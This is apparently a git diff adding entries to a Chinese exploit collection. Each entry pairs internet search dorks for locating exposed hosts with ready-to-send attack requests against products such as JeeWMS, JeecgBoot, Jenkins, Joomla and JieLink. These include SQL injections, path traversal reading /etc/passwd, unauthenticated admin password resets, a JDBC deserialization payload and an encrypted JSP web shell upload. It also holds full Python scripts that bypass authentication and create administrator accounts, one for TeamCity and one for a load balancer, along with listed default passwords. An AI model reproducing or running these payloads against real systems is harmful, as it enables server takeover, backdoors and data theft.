+session = requests.Session()
+
+# Setting 'error' bypasses access control for wizard.fcgi.
+# wizard.fcgi can load any section in the web interface.
+params = { 'error': 1,
+          'section': 'Access Management:LocalUsers' }
+
+# Create new user request
+# _form_submitted to bypass CSRF
+data = {  '_form_submitted': 'form',
+          'create_user': 'Create',
+          'group': 'admin',
+          'newusername': new_admin_name,
+          'password1': new_admin_password,
+          'password2': new_admin_password }
+
+# Post request
+r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)
+
+# View response
+content = r.content.decode('utf-8')
+print(content)
+
+if r.status_code == 200 and '<title>2<' in content:
+    print("New user request sent")
+    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
+else:
+    print("Unable to create new user")  
+```
+
diff --git a/JAVA-Public-CMS-后台RCE漏洞.md b/JAVA-Public-CMS-后台RCE漏洞.md
new file mode 100644
index 0000000..e664de0
--- /dev/null
+++ b/JAVA-Public-CMS-后台RCE漏洞.md
@@ -0,0 +1,18 @@
+## JAVA Public CMS 后台RCE漏洞
+```
+下载地址：https://github.com/sanluan/PublicCMS/
+```
+
+## 漏洞复现
+![](./assets/20231030204825883.png)
+
+![](./assets/20231030205452844.png)
+
+![](./assets/20231030205817368.png)
+
+![](./assets/20231030205843222.png)
+
+## 环境搭建和复现
+```
+https://mp.weixin.qq.com/s/MHNVFo6EK8CZtelMaGOBxA
+```
diff --git a/JCGJHR-N835R后台存在命令执行.md b/JCGJHR-N835R后台存在命令执行.md
new file mode 100644
index 0000000..c050dbc
--- /dev/null
+++ b/JCGJHR-N835R后台存在命令执行.md
@@ -0,0 +1,27 @@
+# JCG JHR-N835R 后台存在命令执行
+
+# 一、漏洞简介
+JCG JHR-N835R 后台存在命令执行，通过 ; 分割 ping 命令导致任意命令执行
+
+# 二、影响版本
++ JCG JHR-N835R 
+
+# 三、资产测绘
++ hunter`web.body="graphics/bottom.gif"`
++ 特征
+
+![1700219199879-d6f8889d-692c-41ca-9223-e9669ff7cded.png](./img/P60bqolSQuyX5ldF/1700219199879-d6f8889d-692c-41ca-9223-e9669ff7cded-411046.png)
+
+# 四、漏洞复现
+1. 通过默认账号`admin/admin`登录
+
+![1700219286833-d1c58fec-c420-48dd-ad6a-b35fdc0b3acd.png](./img/P60bqolSQuyX5ldF/1700219286833-d1c58fec-c420-48dd-ad6a-b35fdc0b3acd-436378.png)
+
+2. 在后台系统工具那使用 PING工具，使用 ; 命令执行绕过
+
+![1700219376026-a9ecdf59-448c-4f65-a04c-0c74b905c7cd.png](./img/P60bqolSQuyX5ldF/1700219376026-a9ecdf59-448c-4f65-a04c-0c74b905c7cd-505558.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xq0kmca04hi8g2yd>
\ No newline at end of file
diff --git a/JEEWMS仓库管理系统任意文件读取漏洞.md b/JEEWMS仓库管理系统任意文件读取漏洞.md
new file mode 100644
index 0000000..6bcb945
--- /dev/null
+++ b/JEEWMS仓库管理系统任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+## JEEWMS仓库管理系统任意文件读取漏洞
+
+## fofa
+```
+body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"或者fid="cC2r/XQpJXcYiYFHOc77bg=="
+```
+![image](https://github.com/wy876/POC/assets/139549762/0fc82b26-4cd9-4924-b461-aa64aef53160)
+
+## poc
+```
+GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
+Host: ip:port
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/490b9323-3a5c-4f4a-8ca0-24e2f1ecbf6d)
diff --git a/JEEWMS系统cgFormBuildController.do存在SQL注入漏洞.md b/JEEWMS系统cgFormBuildController.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..4ad415c
--- /dev/null
+++ b/JEEWMS系统cgFormBuildController.do存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# JEEWMS系统cgFormBuildController.do存在SQL注入漏洞
+
+JEEWMS系统cgFormBuildController.do存在SQL注入漏洞
+
+## fofa
+
+```javascript
+body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
+```
+
+## poc
+
+默认密码：admin/llg123
+
+```javascript
+GET /jeewms/cgFormBuildController.do?mobileForm&tableName='and/**/updatexml(1,concat(0x7e,user(),0x7e),1)and' HTTP/1.1
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Cookie: JSESSIONID=638E9021C7F71842BDAD39D26DD10E48; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=1990
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+```
+
+![image-20250220152053729](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502201520931.png)
\ No newline at end of file
diff --git a/JEEWMS系统cgReportController.do存在SQL注入漏洞.md b/JEEWMS系统cgReportController.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..a392e19
--- /dev/null
+++ b/JEEWMS系统cgReportController.do存在SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# JEEWMS系统cgReportController.do存在SQL注入漏洞
+
+JEEWMS系统cgReportController.do存在SQL注入漏洞
+
+## fofa
+
+```javascript
+body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
+```
+
+## poc
+
+1. 构建 POC，登录后端捕获数据包，并替换 cookie
+
+```javascript
+admin/llg123
+http://localhost:8083/jeewms/cgReportController.do?list&id=1
+```
+
+1. 使用 SQLMAP 重现和构造执行语句
+
+```javascript
+ python sqlmap.py -u "http://localhost:8083/jeewms/cgReportController.do?list&id=1" --cookie="XXXXX" -p id --current-db
+```
+
+![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211356436.png)
+
+
+
+## 漏洞来源
+
+- [JEEWMS-cgReportController.do？List&ID 存在 SQL 注入漏洞 ·问题 #IBFTVK ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFTVK)
\ No newline at end of file
diff --git a/JEEWMS系统commonController.do存在任意文件上传漏洞.md b/JEEWMS系统commonController.do存在任意文件上传漏洞.md
new file mode 100644
index 0000000..aad219a
--- /dev/null
+++ b/JEEWMS系统commonController.do存在任意文件上传漏洞.md
@@ -0,0 +1,36 @@
+# JEEWMS系统commonController.do存在任意文件上传漏洞
+
+JeeWMS是一款免费开源的仓库管理系统，支持3PL和厂内物流，涵盖订单管理，仓储管理，计费管理，现场作业，RFID，AGV等功能。本文介绍了系统的简介，功能，安装，截图和链接，适合仓储企业和开发者参考。JEEWMS系统commonController.do存在任意文件上传漏洞
+
+## fofa
+
+```javascript
+body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
+```
+
+## poc
+
+```javascript
+POST /jeewms/commonController.do?parserXml HTTP/1.1
+Host: localhost:8083
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
+Cookie: JSESSIONID=F571DC569F0A3DC553D8D25ACA42D570; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=1990; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1713256699,1713260101
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHRhkXyQjTSAk8j8c
+Content-Length: 792
+
+
+------WebKitFormBoundaryHRhkXyQjTSAk8j8c
+Content-Disposition: form-data; name="file"; filename="hai.jsp"
+Content-Type: image/png
+
+<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
+------WebKitFormBoundaryHRhkXyQjTSAk8j8c--
+```
+
+![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211354702.png)
+
+![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211354338.png)
+
+## 漏洞来源
+
+- [JEEWMS-commonController.do？存在用于文件上传的 ParserXML ·问题 #IBFTZ7 ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFTZ7)
\ No newline at end of file
diff --git a/JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md b/JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md
new file mode 100644
index 0000000..688fcd4
--- /dev/null
+++ b/JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞.md
@@ -0,0 +1,21 @@
+# JEEWMS系统dynamicDataSourceController.do存在JDBC反序列化漏洞
+
+JeeWMS是一款免费开源的仓库管理系统，支持3PL和厂内物流，涵盖订单管理，仓储管理，计费管理，现场作业，RFID，AGV等功能。本文介绍了系统的简介，功能，安装，截图和链接，适合仓储企业和开发者参考。厦门市灵鹿谷科技有限公司JEEWMS    dynamicDataSourceController.do JDBC反序列化漏洞，导致攻击者可以获取系统主机权限
+
+## fofa
+
+```javascript
+body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
+```
+
+## poc
+
+```javascript
+GET /rest/../dynamicDataSourceController.do?testConnection&driverClass=com.mysql.jdbc.Driver&url=jdbc:mysql://{{tempdns}}/test?detectCustomCollations=true%26autoDeserialize=true&dbUser=test_user HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+```
+
+利用工具：https://github.com/fnmsd/MySQL_Fake_Server
+
diff --git a/JEEWMS系统graphReportController.do存在SQL注入漏洞.md b/JEEWMS系统graphReportController.do存在SQL注入漏洞.md
new file mode 100644
index 0000000..f570e03
--- /dev/null
+++ b/JEEWMS系统graphReportController.do存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+# JEEWMS系统cgReportController.do存在SQL注入漏洞
+
+JEEWMS系统cgReportController.do存在SQL注入漏洞
+
+## fofa
+
+```javascript
+body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
+```
+
+## poc
+
+默认密码 admin/llg123
+
+```
+GET /jeewms/graphReportController.do?datagridGraph&configId=CWSYL&store_code=1' HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+```
+
+```javascript
+python sqlmap.py -u "http://localhost:8083/jeewms/graphReportController.do?datagridGraph&configId=CWSYL&store_code=1" --cookie="JSESSIONID=B0A3B7BC426F86462B08A69CA6F88FF9; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=1990; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1713256699,1713260101" -p store_code --current-db
+```
+
+![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211400590.png)
+
+## 漏洞来源
+
+- [JEEWMS-graphReportController.do？# store_comde 中存在 SQL 注入漏洞 ·问题 #IBFK93 ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFK93)
+
diff --git a/JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md b/JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md
new file mode 100644
index 0000000..d46ae5b
--- /dev/null
+++ b/JFinalCMS-任意文件读取漏洞(CVE-2023-41599).md
@@ -0,0 +1,22 @@
+## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
+
+
+## 特征
+```
+fofa:
+body="content=\"JreCms"
+
+hunter:
+web.body="content=\"JreCms"
+```
+## POC
+```
+Windows: /../../../../../../../../../test.txt
+Linux:	/../../../../../../../../../etc/passwd
+
+/common/down/file?filekey=/../../../../../../../../../etc/passwd
+```
+
+
+## 漏洞分析
+http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
diff --git a/JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307).md b/JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307).md
new file mode 100644
index 0000000..5348e17
--- /dev/null
+++ b/JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307).md
@@ -0,0 +1,32 @@
+# JeecgBoot接口getTotalData存在未授权SQL注入漏洞(CVE-2024-48307)
+
+JeecgBoot v3.7.1被发现包含通过组件/onlDragDatasetHead/getTotalData的SQL注入漏洞。
+
+## fofa
+
+```javascript
+body="jeecg-boot"
+```
+
+## poc
+
+```javascript
+POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
+Host: localhost:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/json
+Content-Length: 284
+
+{"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
+```
+
+![image-20241128101830162](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281018255.png)
+
+## 漏洞来源
+
+- https://github.com/jeecgboot/JeecgBoot/issues/7237
diff --git a/JeecgBoot系统接口passwordChange任意用户密码重置漏洞.md b/JeecgBoot系统接口passwordChange任意用户密码重置漏洞.md
new file mode 100644
index 0000000..143deaa
--- /dev/null
+++ b/JeecgBoot系统接口passwordChange任意用户密码重置漏洞.md
@@ -0,0 +1,25 @@
+# JeecgBoot系统接口passwordChange任意用户密码重置漏洞
+
+Jeecg Boot是一个企业级低代码开发平台，基于前后端分离的架构，融合了SpringBoot、SpringCloud、Ant Design、Vue、Mybatis-plus、Shiro、JWT等多种主流技术，旨在帮助企业快速构建各种应用系统，提高开发效率，降低开发成本。
+
+JeecgBoot系统接口passwordChange任意用户密码重置漏洞，未经身份验证的远程攻击者可以利用此漏洞重置管理员账户密码，从而接管系统后台，造成信息泄露，导致系统处于极不安全的状态。
+
+## fofa
+
+```javascript
+body="/sys/common/pdf/pdfPreviewIframe"
+```
+
+## poc
+
+```javascript
+GET /jeecg-boot/sys/user/passwordChange?username=admin&password=admin&smscode=&phone= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20241219145613854](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191456905.png)
\ No newline at end of file
diff --git a/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md b/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md
new file mode 100644
index 0000000..8fe1259
--- /dev/null
+++ b/Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044).md
@@ -0,0 +1,59 @@
+# Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044)
+
+Jenkins是一个开源的、提供持续集成服务（CI）的软件平台。Jenkins 使用 Remoting 库（通常为agent.jar或remoting.jar）实现控制器与代理之间的通信，该库允许代理从控制器加载类和类加载器资源，以便从控制器发送的 Java 对象（构建步骤等）可以在代理上执行。
+
+**Jenkins Remoting任意文件读取漏洞(CVE-2024-43044)**，由于Remoting库ClassLoaderProxy#fetchJar方法没有限制代理请求从控制器文件系统读取的路径，可能导致**拥有Agent/Connect权限**的攻击者从Jenkins控制器文件系统读取任意文件（如凭证、配置文件等敏感信息）并进一步利用导致远程代码执行。
+
+## fofa
+
+```javascript
+app="Jenkins"
+```
+
+## poc
+
+通过`http://ip:port/jnlpJars/agent.jar`下载jar包
+
+修改`\hudson\remoting\RemoteClassLoader.class`对应代码
+
+![image-20240905091939652](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050919209.png)
+
+```java
+
+try {  
+    Scanner scanner = new Scanner(System.in);  
+    System.out.print("输入读取文件path:");  
+    String inputText = scanner.nextLine();  
+    System.out.println("尝试读取:" + inputText);  
+    URL jarFileUrl = new URL("file:///" + inputText);  
+    byte[] fileContent = this.proxy.fetchJar(jarFileUrl);  
+    String contentAsString = new String(fileContent, StandardCharsets.UTF_8);  
+    System.out.println("文件内容:\n" + contentAsString);  
+} catch (Exception var10) {  
+    System.out.println("WRONG:" + var10);  
+}
+```
+
+需提前获悉node的密钥和名称
+
+![image-20240905092102978](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050921039.png)
+
+```java
+java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>
+```
+
+![image-20240905092434004](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050924072.png)
+
+### exp
+
+```
+https://github.com/convisolabs/CVE-2024-43044-jenkins
+```
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/559
+- https://github.com/v9d0g/CVE-2024-43044-POC
+- https://github.com/convisolabs/CVE-2024-43044-jenkins
\ No newline at end of file
diff --git a/JetBrains-TeamCity-身份验证绕过漏洞(CVE-2024-27198).md b/JetBrains-TeamCity-身份验证绕过漏洞(CVE-2024-27198).md
new file mode 100644
index 0000000..8418a2d
--- /dev/null
+++ b/JetBrains-TeamCity-身份验证绕过漏洞(CVE-2024-27198).md
@@ -0,0 +1,58 @@
+## JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)
+
+JetBrains TeamCity发布新版本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证，创建管理员账户，完全控制所有TeamCity项目、构建、代理和构件，为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
+
+## fofa
+```
+body="Log in to TeamCity"
+```
+
+## poc
+```python
+import requests
+import urllib3
+import argparse
+import re
+urllib3.disable_warnings()
+ 
+parser = argparse.ArgumentParser()
+parser.add_argument("-t", "--target",required=True, help="Target TeamCity Server URL")
+parser.add_argument("-u", "--username", required=True,help="Insert username for the new user")
+parser.add_argument("-p", "--password",required=True, help="Insert password for the new user")
+args = parser.parse_args()
+ 
+vulnerable_endpoint = "/pwned?jsp=/app/rest/users;.jsp" # Attacker’s path to exploit CVE-2024-27198, please refer to the Rapid7's blogpost for more information
+ 
+def check_version():
+    response = requests.get(args.target+"/login.html", verify=False) 
+    repattern = r'<span class="vWord">Version</span>(.+?)</span>' # Regex pattern to extract the TeamCity version number
+    try:
+        version = re.findall(repattern, response.text)[0]
+        print("[+] Version Found:", version)
+    except:
+        print("[-] Version not found")
+ 
+def exploit():
+    response = requests.get(args.target+vulnerable_endpoint, verify=False, timeout=10)
+    http_code = response.status_code
+    if http_code == 200:
+        print("[+] Server vulnerable, returning HTTP", http_code) # HTTP 200 Status code is needed to confirm if the TeamCity Server is vulnerable to the auth bypass vuln
+        create_user = {
+            "username": args.username,
+            "password": args.password,
+            "email": f"{args.username}@mydomain.com",
+            "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}, # Given admin permissions to your new user, basically you can have complete control of this TeamCity Server
+        }
+        headers = {"Content-Type": "application/json"}
+        create_user = requests.post(args.target+vulnerable_endpoint, json=create_user, headers=headers, verify=False) # POST request to create the new user with admin privileges
+        if create_user.status_code == 200:
+            print("[+] New user", args.username, "created succesfully! Go to", args.target+"/login.html to login with your new credentials :)")
+        else:
+            print("[-] Error while creating new user")
+ 
+    else:
+        print("[-] Probable not vulnerable, returning HTTP", http_code) 
+ 
+check_version()
+exploit()
+```
diff --git a/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md b/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md
new file mode 100644
index 0000000..8b3235e
--- /dev/null
+++ b/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md
@@ -0,0 +1,67 @@
+## JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞
+
+JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞，恶意攻击者可能会利用此漏洞修改数据库中的数据，例如添加、删除或修改记录，导致数据损坏或丢失。
+
+## fofa
+
+```yaml
+title="JieLink+智能终端操作平台"
+```
+
+## poc
+
+```
+POST /report/ParkChargeRecord/GetDataList HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: application/json, text/javascript, \*/\*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Authorization: Bearer test
+Cookie: JSESSIONID=test;UUID=1; userid=admin
+X-Requested-With: XMLHttpRequest
+Content-Length: 21
+Origin: http://x.xx.xx.x:xxx
+Connection: close
+Referer: http://x.xx.xx.x:xxx/Report/ParkOutRecord/Index
+Sec-GPC: 1
+Priority: u=1
+
+page=1&rows=20000
+```
+
+```
+GET /Report/ParkCommon/GetParkInThroughDeivces HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: application/json, text/javascript, \*/\*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Origin:
+Connection: close
+Referer:
+Sec-GPC: 1
+```
+
+```
+GET /report/ParkOutRecord/GetDataList HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: application/json, text/javascript, \*/\*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Authorization: Bearer test
+Cookie: JSESSIONID=test;UUID=1; userid=admin
+X-Requested-With: XMLHttpRequest
+Content-Length: 2
+Origin:
+Connection: close
+Referer:
+Sec-GPC: 1
+Priority: u=1
+```
+
+![image-20240820094038330](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408200941857.png)
\ No newline at end of file
diff --git a/Joomla-未授权漏洞CVE-2023-23752.md b/Joomla-未授权漏洞CVE-2023-23752.md
new file mode 100644
index 0000000..0340d73
--- /dev/null
+++ b/Joomla-未授权漏洞CVE-2023-23752.md
@@ -0,0 +1,262 @@
+## Joomla 未授权漏洞 CVE-2023-23752
+
+受影响的版本：4.0.0 ~ 4.2.7
+
+存在漏洞的路由为Rest API，Rest API于4.x正式开发
+
+## 下载地址：
+https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.zip?format=zip
+
+## Payload
+```
+通过此API用于获取网站最重要的配置信息，其中包含数据库的账号与密码。
+
+/api/index.php/v1/config/application?public=true 
+```
+![](./assets/_20230922171727.png)
+
+
+## 其他api
+```
+v1/banners
+v1/banners/:id
+v1/banners
+v1/banners/:id
+v1/banners/:id
+v1/banners/clients
+v1/banners/clients/:id
+v1/banners/clients
+v1/banners/clients/:id
+v1/banners/clients/:id
+v1/banners/categories
+v1/banners/categories/:id
+v1/banners/categories
+v1/banners/categories/:id
+v1/banners/categories/:id
+v1/banners/:id/contenthistory
+v1/banners/:id/contenthistory/keep
+v1/banners/:id/contenthistory
+v1/config/application
+v1/config/application
+v1/config/:component_name
+v1/config/:component_name
+v1/contacts/form/:id
+v1/contacts
+v1/contacts/:id
+v1/contacts
+v1/contacts/:id
+v1/contacts/:id
+v1/contacts/categories
+v1/contacts/categories/:id
+v1/contacts/categories
+v1/contacts/categories/:id
+v1/contacts/categories/:id
+v1/fields/contacts/contact
+v1/fields/contacts/contact/:id
+v1/fields/contacts/contact
+v1/fields/contacts/contact/:id
+v1/fields/contacts/contact/:id
+v1/fields/contacts/mail
+v1/fields/contacts/mail/:id
+v1/fields/contacts/mail
+v1/fields/contacts/mail/:id
+v1/fields/contacts/mail/:id
+v1/fields/contacts/categories
+v1/fields/contacts/categories/:id
+v1/fields/contacts/categories
+v1/fields/contacts/categories/:id
+v1/fields/contacts/categories/:id
+v1/fields/groups/contacts/contact
+v1/fields/groups/contacts/contact/:id
+v1/fields/groups/contacts/contact
+v1/fields/groups/contacts/contact/:id
+v1/fields/groups/contacts/contact/:id
+v1/fields/groups/contacts/mail
+v1/fields/groups/contacts/mail/:id
+v1/fields/groups/contacts/mail
+v1/fields/groups/contacts/mail/:id
+v1/fields/groups/contacts/mail/:id
+v1/fields/groups/contacts/categories
+v1/fields/groups/contacts/categories/:id
+v1/fields/groups/contacts/categories
+v1/fields/groups/contacts/categories/:id
+v1/fields/groups/contacts/categories/:id
+v1/contacts/:id/contenthistory
+v1/contacts/:id/contenthistory/keep
+v1/contacts/:id/contenthistory
+v1/content/articles
+v1/content/articles/:id
+v1/content/articles
+v1/content/articles/:id
+v1/content/articles/:id
+v1/content/categories
+v1/content/categories/:id
+v1/content/categories
+v1/content/categories/:id
+v1/content/categories/:id
+v1/fields/content/articles
+v1/fields/content/articles/:id
+v1/fields/content/articles
+v1/fields/content/articles/:id
+v1/fields/content/articles/:id
+v1/fields/content/categories
+v1/fields/content/categories/:id
+v1/fields/content/categories
+v1/fields/content/categories/:id
+v1/fields/content/categories/:id
+v1/fields/groups/content/articles
+v1/fields/groups/content/articles/:id
+v1/fields/groups/content/articles
+v1/fields/groups/content/articles/:id
+v1/fields/groups/content/articles/:id
+v1/fields/groups/content/categories
+v1/fields/groups/content/categories/:id
+v1/fields/groups/content/categories
+v1/fields/groups/content/categories/:id
+v1/fields/groups/content/categories/:id
+v1/content/articles/:id/contenthistory
+v1/content/articles/:id/contenthistory/keep
+v1/content/articles/:id/contenthistory
+v1/extensions
+v1/languages/content
+v1/languages/content/:id
+v1/languages/content
+v1/languages/content/:id
+v1/languages/content/:id
+v1/languages/overrides/search
+v1/languages/overrides/search/cache/refresh
+v1/languages/overrides/site/zh-CN
+v1/languages/overrides/site/zh-CN/:id
+v1/languages/overrides/site/zh-CN
+v1/languages/overrides/site/zh-CN/:id
+v1/languages/overrides/site/zh-CN/:id
+v1/languages/overrides/administrator/zh-CN
+v1/languages/overrides/administrator/zh-CN/:id
+v1/languages/overrides/administrator/zh-CN
+v1/languages/overrides/administrator/zh-CN/:id
+v1/languages/overrides/administrator/zh-CN/:id
+v1/languages/overrides/site/en-GB
+v1/languages/overrides/site/en-GB/:id
+v1/languages/overrides/site/en-GB
+v1/languages/overrides/site/en-GB/:id
+v1/languages/overrides/site/en-GB/:id
+v1/languages/overrides/administrator/en-GB
+v1/languages/overrides/administrator/en-GB/:id
+v1/languages/overrides/administrator/en-GB
+v1/languages/overrides/administrator/en-GB/:id
+v1/languages/overrides/administrator/en-GB/:id
+v1/languages
+v1/languages
+v1/media/adapters
+v1/media/adapters/:id
+v1/media/files
+v1/media/files/:path/
+v1/media/files/:path
+v1/media/files
+v1/media/files/:path
+v1/media/files/:path
+v1/menus/site
+v1/menus/site/:id
+v1/menus/site
+v1/menus/site/:id
+v1/menus/site/:id
+v1/menus/administrator
+v1/menus/administrator/:id
+v1/menus/administrator
+v1/menus/administrator/:id
+v1/menus/administrator/:id
+v1/menus/site/items
+v1/menus/site/items/:id
+v1/menus/site/items
+v1/menus/site/items/:id
+v1/menus/site/items/:id
+v1/menus/administrator/items
+v1/menus/administrator/items/:id
+v1/menus/administrator/items
+v1/menus/administrator/items/:id
+v1/menus/administrator/items/:id
+v1/menus/site/items/types
+v1/menus/administrator/items/types
+v1/messages
+v1/messages/:id
+v1/messages
+v1/messages/:id
+v1/messages/:id
+v1/modules/types/site
+v1/modules/types/administrator
+v1/modules/site
+v1/modules/site/:id
+v1/modules/site
+v1/modules/site/:id
+v1/modules/site/:id
+v1/modules/administrator
+v1/modules/administrator/:id
+v1/modules/administrator
+v1/modules/administrator/:id
+v1/modules/administrator/:id
+v1/newsfeeds/feeds
